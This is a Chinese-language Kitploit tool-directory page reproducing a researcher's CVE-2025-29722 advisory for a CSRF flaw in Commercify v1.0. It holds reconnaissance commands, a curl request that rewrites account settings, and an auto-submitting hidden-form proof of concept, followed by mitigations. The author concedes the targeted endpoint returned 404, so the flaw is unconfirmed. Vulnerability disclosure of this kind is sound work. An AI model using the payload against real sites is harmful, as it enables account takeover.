Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-29722 — Commercify v1.0 中的跨站请求伪造(CSRF) | Kitploit
工具/GitHubGitHub/cypherdavy/cve-2025-29722
侦察漏洞分析Web应用程序漏洞利用Web安全渗透测试学习与教育
GitHubcypherdavy/cve-2025-29722

CVE-2025-29722

Commercify v1.0 中的跨站请求伪造(CSRF)

查看仓库
1年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

🛡️ CVE-2025-29722 – Commercify v1.0 中的跨站请求伪造(CSRF)漏洞

发现者:David P.S Abraham(又名 Davycipher)


CVE 编号

CVE-2025-29722 已由 MITRE Corporation 分配给此漏洞。


摘要

在 Commercify v1.0 中发现了一个 CSRF 漏洞,这是一个由 @yassmittal 开发的开源电子商务平台。该应用在 /update_settings 等关键端点上缺少适当的 CSRF 防护机制,攻击者可在其他域名下构造恶意请求来修改用户数据。


受影响产品

  • 产品名称: Commercify
  • 版本: 1.0
  • 仓库: https://github.com/yassmittal/Commercify

漏洞类型

  • CWE-352:跨站请求伪造(CSRF)

利用过程

侦察阶段

nmap 扫描显示该服务可通过端口 5173 访问,表明这可能是一个开发服务器。

root@kitploit:~
nmap -p 5173 localhost

接下来,我使用 nikto 扫描了该应用,发现:

  • 缺少 X-Frame-Options 响应头
  • 宽松的 CORS 策略(Access-Control-Allow-Origin: *)
  • 缺少 CSRF 防护响应头

端点暴力枚举

在探索应用的过程中,根据用户仪表盘的功能,我怀疑可能存在 update_settings 端点。我使用以下命令对其进行了测试:

root@kitploit:~
curl -X POST "http://localhost:5173/update_settings" \
-d "username=attacker&[email protected]"

虽然返回了 404 Not Found,但此行为可能因环境而异。在有效的部署环境中,这可能导致账户被完全操控。


概念验证(PoC)

基于 HTML 的攻击,用于利用该 CSRF 缺陷:

root@kitploit:~
<form action="http://localhost:5173/update_settings" method="POST">
  <input type="hidden" name="username" value="attacker">
  <input type="hidden" name="email" value="[email protected]">
</form>
<script>
  document.forms[0].submit();
</script>

影响

  • 未经授权修改用户账户数据
  • 如果设置中包含角色或邮箱篡改,则可能导致权限提升
  • 账户接管场景

根本原因

  • 缺少 CSRF 令牌
  • 未设置 SameSite Cookie 属性
  • 宽松的 CORS(*)
  • 未验证 Referer 或 Origin

缓解措施与建议

  • 为所有改变状态的端点添加 CSRF 令牌
  • 在 Cookie 上设置 SameSite=Strict 或 Lax
  • 定义严格的 CORS 策略
  • 实施 Origin/Referer 验证

发现者

David P.S. Abraham
别名:Davycipher

  • GitHub
  • LinkedIn
  • 网站

下载工具